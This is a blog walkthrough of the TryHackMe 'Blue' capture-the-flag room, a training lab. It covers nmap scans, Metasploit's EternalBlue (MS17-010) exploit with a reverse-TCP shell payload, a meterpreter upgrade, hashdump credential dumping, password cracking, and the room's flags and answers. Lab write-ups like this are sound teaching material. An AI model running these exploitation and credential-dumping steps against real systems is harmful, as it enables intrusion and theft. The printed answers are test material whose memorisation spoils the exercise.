THM – Blue CTF Room

This CTF challenge room is hosted by the team over at TryHackMe; it’ll take us from Recon, through exploitation and privilege escalation of the Windows box, then flag finding. We’ll be using nmap, Metasploit, EternalBlue payloads, system registries, hashdump and several other components.

The room’s description is ‘Deploy & hack into a Windows machine, leveraging common misconfigurations issues.’

Task 1- Recon

Q) How many ports are open with a port number under 1000?

CTF Task 1

Let’s run a quick nmap command, with a few switches that may be useful for later too.

sudo nmap 10.10.170.191 -sV -sC -O -Pn -p-1000 | tee nmap.txt

sV for establishing service versions.

sC for standard scripts

O for OS detection (we’re expecting Window’s, obviously)

Pn for ignoring ping scanning to determine if the host is up (we’re told it wont respond)

-p-1000 only scan first 1000 ports

The response:

Starting Nmap 7.92 ( https://nmap.org ) at 2021-01-14 03:55 EST
Nmap scan report for 10.10.170.191
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/14%OT=135%CT=1%CU=30073%PV=Y%DS=2%DC=I%G=Y%TM=61E13B
OS:26%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS
OS:=7)OPS(O1=M505NW8ST11%O2=M505NW8ST11%O3=M505NW8NNT11%O4=M505NW8ST11%O5=M
OS:505NW8ST11%O6=M505ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M505NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 3h27m51s, median: -1s
| smb2-time: 
|   date: 2021-01-14T08:58:07
|_  start_date: 2021-01-14T08:42:47
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:e0:73:3d:1c:cd (unknown)
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-01-14T02:58:07-06:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.16 seconds

Q) How many ports are open with a port number under 1000?

A) 3

Next we’re asked to identify the vulnerabilty on the server. We can do this again from nmap, using it’s built in scripting engine.

Q) What is this machine vulnerable to?

(Answer in the form of: ms??-???, ex: ms08-067)

We can see from the question that the vulnerabilty is Microsoft based (‘ms’), and the obvious exposed service we previous saw was SMB. If we combine these two bits of information we can narrow down which scripts to run through nmap.

They’re all stored in /usr/share/nmap/scripts

We can run this command to test all SMB & MS focused vulnerabilities.

$ sudo nmap 10.10.170.191 --script=smb*ms* | tee nmap_script_smb.txt

This quickly responds with:

Starting Nmap 7.92 ( https://nmap.org ) at 2021-01-14 05:10 EST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.20% done; ETC: 05:11 (0:00:00 remaining)
Nmap scan report for 10.10.170.191
Host is up (0.090s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds

So we can see that the server is potentially vulnerably to the 2017 critical remote code execution vulnerability of Microsoft SMBv1 servers. This exploit has the CVE-2017-0143 (ms17-010).

Q) What is this machine vulnerable to?

(Answer in the form of: ms??-???, ex: ms08-067)

A) MS17-010

With this question answered, Task 1 Recon is complete.

Task 2) Gain Access

So it looks like TryHackMe wants us to use Metasploit to gain access toi this machine.

Use this command to fire up Metasploit

$ msfconsole

Q) Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

We’re then asked to find a payload that could exploit the vulnerabilty discovered during the recon phase. So lets search for it:

msf6 > search "MS17-010"

If that output is too hard to read, here’s a summary of the MS17-010 exploits:

Matching Modules
================

#  Name
Description

0  exploit/windows/smb/ms17_010_eternalblue
EternalBlue SMB Remote Windows Kernel Pool Corruption

1  exploit/windows/smb/ms17_010_psexec
SMB Remote Windows Code Execution

2  auxiliary/admin/smb/ms17_010_command
SMB Remote Windows Command Execution

3  auxiliary/scanner/smb/smb_ms17_010
SMB RCE Detection

4  exploit/windows/smb/smb_doublepulsar_rce
Remote Code Execution

We can check out each module in more depth using the command info X (where X is the module # of the previous response).

If we look at the MS17_010_eternalblue module:

msf6 > info 0

Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14

Provided by: ...

Available targets:
Id  Name
--  ----
0   Automatic Target
1   Windows 7
2   Windows Embedded Standard 7
3   Windows Server 2008 R2
4   Windows 8
5   Windows 8.1
6   Windows Server 2012
7   Windows 10 Pro
8   Windows 10 Enterprise Evaluation

Check supported:
Yes

Basic options:
Name           Current Setting  Required  Description
----           ---------------  --------  -----------
RHOSTS                          yes       
The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

RPORT          445              yes       The target port (TCP)

SMBDomain                       no        
(Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

SMBPass                         no        
(Optional) The password for the specified username

SMBUser                         no        
(Optional) The username to authenticate as

VERIFY_ARCH    true             yes       
Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

VERIFY_TARGET  true             yes       
Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload information:
Space: 2000

Description:
This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.

References: ...

Also known as: ETERNALBLUE

Seems like a good place to start.

Q) Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

A) exploit/windows/smb/ms17_010_eternalblue

Let’s use that exploit.

Q) Show options and set the one required value. What is the name of this value? (All caps for submission)

msf6 > use exploit/windows/smb/ms17_010_eternalblue
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

We can see from the options that this exploit has 4 required options, however 3 come pre-populated. The one value it could never have a default value for is the host target.

Q) Show options and set the one required value. What is the name of this value? (All caps for submission)

A) RHOSTS

So we best set that:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.170.191

RHOSTS => 10.10.170.191

TryHackMe then asks us to specify the payload:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp

payload => windows/x64/shell/reverse_tcp

Then we can run the exploit:

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.8.39.10:4444 
[*] 10.10.130.233:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.130.233:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.130.233:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.130.233:445 - The target is vulnerable.
[*] 10.10.130.233:445 - Connecting to target for exploitation.
[+] 10.10.130.233:445 - Connection established for exploitation.
[+] 10.10.130.233:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.130.233:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.130.233:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.130.233:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.130.233:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.130.233:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.130.233:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.130.233:445 - Sending all but last fragment of exploit packet
[*] 10.10.130.233:445 - Starting non-paged pool grooming
[+] 10.10.130.233:445 - Sending SMBv2 buffers
[+] 10.10.130.233:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.130.233:445 - Sending final SMBv2 buffers.
[*] 10.10.130.233:445 - Sending last fragment of exploit packet!
[*] 10.10.130.233:445 - Receiving response from exploit packet
[+] 10.10.130.233:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.130.233:445 - Sending egg to corrupted connection.
[*] 10.10.130.233:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.130.233
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Command shell session 1 opened (10.8.39.10:4444 -> 10.10.130.233:49163 ) at 2021-01-14 06:04:14 -0500


Shell Banner:
Microsoft Windows [Version 6.1.7601]

And we get dropped into a DOS shell!

Our foothold on the Window’s server has been established.

Task 2 Troubleshooting

Myself and many others seem to get multiple issues with dropped the MS17-010 EternalBlue exploit onto the target.

I got dozens of FAIL messages.

Using the TryHackMe built in Linux AttachMachine provided a more reliable connection, so try that (it still wasn’t rock-solid though)

Task 3) Escalate

Now we’re on the box, can we escalate our privileges?

Q) If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

So lets do a bit of research:

Q) If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

A) post/multi/manage/shell_to_meterpreter

If we use that module, we can re-run our options command to see which required field is left blank.

msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit ...
   LHOST                     no        IP of host that ...
   LPORT    4433             yes       Port for payload to...
   SESSION                   yes       The session to run ...

We can see which sessions Metasploit has open currently:

Just the one, as expected.

No we have the SESSION option set, let’s run the meterpreter:

(This was slow, aka ~10-20m slow)

Eventually I had to resort to the THM built in machine. Finally the payload allowed for the meterpreter shell:

We were then able to execute ps and browse the current process list:

We could then migrate the cmd.exe service:

Task 4) Cracking

Now we’re really getting our teeth into the box.

Can we crack any of the local users passwords?

Q) Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so.

What is the name of the non-default user?

As suggested by the challenge, lets use the hashdump command:

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Q) Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so.

What is the name of the non-default user?

A) Jon

Okay Jon, how good is your password? We copy his password to a local file:

$ echo" Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" >> jon.txt

Then can run JohnTheRipper over it.

So Jon’s password is alqfna22

Task 5) Find the flags

Flag1? This flag can be found at the system root.

Well the system root for a Window’s box is usually assigned to the drive letter C:\

C:\>type flag1.txt
type flag1.txt
flag{access_the_machine}

Flag2? This flag can be found at the location where passwords are stored within Windows.

*Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

Passwords are normally stored in the Registry, so lets take a look over there.

After a bit of hunting around… I overthought this, the flag was found in the Config folder:

C:\Windows\System32\config>type flag2.txt
type flag2.txt
flag{sam_database_elevated_access}

Flag 3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Again I massively overthought this location. It simply means in Jon’s Documents folder:

C:\Users\Jon\Documents>type flag3.txt
type flag3.txt
flag{admin_documents_can_be_valuable}

Blue CTF Badge Acquired

There we have it – the TryHackMe Blue room is completed.

Fairly straight forward but rather annoying fragility on the target box. Rebooted that machine and my local Kali VM so many times.

Tools, scripts and commands used in exploiting this Windows box:

  • nmap
  • Metasploit
  • MS17-010 / EternalBlue SMB exploit
  • JohnTheRipper
  • hashdump

Leave a Reply

Your email address will not be published. Required fields are marked *